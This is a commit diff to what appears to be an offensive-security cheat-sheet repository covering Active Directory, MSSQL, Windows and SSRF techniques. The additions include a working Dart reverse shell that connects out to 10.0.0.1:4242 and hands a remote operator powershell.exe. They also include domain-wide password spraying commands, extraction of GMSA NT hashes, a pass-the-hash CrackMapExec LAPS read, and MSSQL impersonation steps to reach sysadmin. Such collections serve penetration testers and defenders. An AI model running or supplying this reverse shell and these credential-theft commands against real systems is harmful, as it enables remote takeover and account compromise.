GMSA Password + Dart Reverse Shell

2024-11-10 07:04:22 +00:00 · 2021-03-24 12:44:35 +01:00 · 2021-03-24 12:44:35 +01:00 · bd2166027e
commit bd2166027e
parent af9f103655
7 changed files with 103 additions and 8 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -37,6 +37,7 @@
      - [Spray passwords against the RDP service](#spray-passwords-against-the-rdp-service)
    - [Password in AD User comment](#password-in-ad-user-comment)
    - [Reading LAPS Password](#reading-laps-password)
+    - [Reading GMSA Password](#reading-gmsa-password)
    - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
      - [Using Mimikatz](#using-mimikatz)
      - [Using Meterpreter](#using-meterpreter)
@ -195,12 +196,12 @@ use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
 # run the collector on the machine using SharpHound.exe
 # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
 # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
-.\SharpHound.exe (from resources/Ingestor)
-.\SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
-.\SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
 .\SharpHound.exe -c all -d active.htb -SearchForest
 .\SharpHound.exe --EncryptZip --ZipFilename export.zip
-.\SharpHound.exe --CollectionMethod All --LDAPUser <UserName> --LDAPPass <Password> --JSONFolder <PathToFile>
+.\SharpHound.exe -c all,GPOLocalGroup
+.\SharpHound.exe -c all --LDAPUser <UserName> --LDAPPass <Password> --JSONFolder <PathToFile>
+.\SharpHound.exe -c all -d active.htb --LDAPUser <UserName> --LDAPPass <Password> --domaincontroller 10.10.10.100
+

 # or run the collector on the machine using Powershell
 # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
@ -221,6 +222,9 @@ root@payload$ apt install bloodhound

 # start BloodHound and the database
 root@payload$ neo4j console
+# or use docker
+root@payload$ docker run -p7474:7474 -p7687:7687 -e NEO4J_AUTH=neo4j/bloodhound neo4j
+
 root@payload$ ./bloodhound --no-sandbox
 Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
 ```
@ -988,6 +992,17 @@ Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB
 crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
 ```

+Using `DomainPasswordSpray` to spray a password against all users of a domain.
+
+```powershell
+# https://github.com/dafthack/DomainPasswordSpray
+Invoke-DomainPasswordSpray -Password Summer2021!
+
+# /!\ be careful with the account lockout !
+Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
+
+```
+
 #### Spray passwords against the RDP service

 Using RDPassSpray to target RDP services.
@ -1019,6 +1034,35 @@ or dump the Active Directory and `grep` the content.
 ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
 ```

+### Reading GMSA Password
+
+> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed.
+
+#### GMSA Attributes in the Active Directory 
+* **msDS-GroupMSAMembership** (PrincipalsAllowedToRetrieveManagedPassword) - stores the security principals that can access the GMSA password.
+* **msds-ManagedPassword** - This attribute contains a BLOB with password information for group-managed service accounts.
+* **msDS-ManagedPasswordId** - This constructed attribute contains the key identifier for the current managed password data for a group MSA.
+* **msDS-ManagedPasswordInterval** - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.
+
+
+#### Extract NT hash from the Active Directory
+
+* GMSAPasswordReader (C#)
+  ```ps1
+  # https://github.com/rvazarkar/GMSAPasswordReader
+  GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
+  ```
+
+* Active Directory Powershell
+  ```ps1
+  $gmsa =  Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword'
+  $blob = $gmsa.'msDS-ManagedPassword'
+  $mp = ConvertFrom-ADManagedPasswordBlob $blob
+  $hash1 =  ConvertTo-NTHash -Password $mp.SecureCurrentPassword
+  ```
+
+* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module
+

 ### Reading LAPS Password

@ -1036,6 +1080,11 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'

 > The "ms-mcs-AdmPwd" a "confidential" computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users

+* CrackMapExec
+    ```powershell
+    crackmapexec smb 10.10.10.10 -u user -H 8846f7eaee8fb117ad06bdd830b7586c -M laps
+    ```
+
 * Powerview
    ```powershell
    PS > Import-Module .\PowerView.ps1
--- a/Resources/MSSQL
+++ b/Resources/MSSQL
@ -36,7 +36,7 @@
    * [Python](#python)
    * [R](#r)
 * [Audit Checks](#audit-checks)
-	* [Find and exploit impersonation opportunities](#find-and-explit-impersonation-opportunities) 
+	* [Find and exploit impersonation opportunities](#find-and-exploit-impersonation-opportunities) 
 * [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy)
 * [Manual SQL Server Queries](#manual-sql-server-queries)
 	* [Query Current User & determine if the user is a sysadmin](#query-current-user--determine-if-the-user-is-a-sysadmin)
@ -268,6 +268,13 @@ Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Pas

 ## External Scripts

+:warning: You need to enable **external scripts**.
+
+```sql
+sp_configure 'external scripts enabled', 1;
+RECONFIGURE;
+```
+
 ## Python:

 ```ps1
@ -285,6 +292,14 @@ Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DB

 ### Find and exploit impersonation opportunities 

+* Impersonate as: `EXECUTE AS LOGIN = 'sa'`
+* Impersonate `dbo` with DB_OWNER
+	```sql
+	SQL> select is_member('db_owner');
+	SQL> execute as user = 'dbo'
+	SQL> SELECT is_srvrolemember('sysadmin')
+	```
+
 ```ps1
 Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose

--- a/Resources/Reverse
+++ b/Resources/Reverse
@ -7,6 +7,7 @@
    * [Bash TCP](#bash-tcp)
    * [Bash UDP](#bash-udp)
    * [C](#c)
+    * [Dart](#dart)
    * [Golang](#golang)
    * [Groovy Alternative 1](#groovy-alternative-1)
    * [Groovy](#groovy)
@ -346,6 +347,29 @@ int main(void){
 }
 ```

+### Dart
+
+```java
+import 'dart:io';
+import 'dart:convert';
+
+main() {
+  Socket.connect("10.0.0.1", 4242).then((socket) {
+    socket.listen((data) {
+      Process.start('powershell.exe', []).then((Process process) {
+        process.stdin.writeln(new String.fromCharCodes(data).trim());
+        process.stdout
+          .transform(utf8.decoder)
+          .listen((output) { socket.write(output); });
+      });
+    },
+    onDone: () {
+      socket.destroy();
+    });
+  });
+}
+```
+
 ## Meterpreter Shell

 ### Windows Staged reverse TCP
--- a/Resources/Windows
+++ b/Resources/Windows
@ -2,6 +2,7 @@

 ## Summary

+* [Which Endpoint Protection is Using AMSI](#which-endpoint-protection-is-using-amsi)
 * [Patching amsi.dll AmsiScanBuffer by rasta-mouse](#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse)
 * [Dont use net webclient](#Dont-use-net-webclient)
 * [Amsi ScanBuffer Patch from -> https://www.contextis.com/de/blog/amsi-bypass](#Amsi-ScanBuffer-Patch)
@ -17,6 +18,10 @@
 * [Nishang all in one](#Nishang-all-in-one)
 * [Adam Chesters Patch](#Adam-Chester-Patch)

+## Which Endpoint Protection is Using AMSI
+
+* https://github.com/subat0mik/whoamsi/wiki/Which-Endpoint-Protection-is-Using-AMSI%3F
+

 # Patching amsi.dll AmsiScanBuffer by rasta-mouse

--- a/Resources/Windows
+++ b/Resources/Windows
@ -242,6 +242,7 @@ List all network shares

 ```powershell
 net share
+powershell Find-DomainShare -ComputerDomain domain.local
 ```

 SNMP Configuration
@ -272,8 +273,7 @@ PS C:\> Set-MpPreference -DisableIOAVProtection $true
 List AppLocker rules

 ```powershell
-PS C:\> $a = Get-ApplockerPolicy -effective
-PS C:\> $a.rulecollections
+PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
 ```

 ### Powershell
--- a/Forgery/Images/SSRF_PDF.png
+++ b/Forgery/Images/SSRF_PDF.png
--- a/Forgery/README.md
+++ b/Forgery/README.md
@ -223,7 +223,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/
 http://127.1.1.1:80#\@127.2.2.2:80/
 ```

-![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)
+![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)

 ### Bypassing using a redirect
 [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
@ -433,6 +433,8 @@ gopher://127.0.0.1:6379/_save

 ## SSRF exploiting PDF file

+![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.jpg?raw=true)
+
 Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c&feature=emb_title)

 ```powershell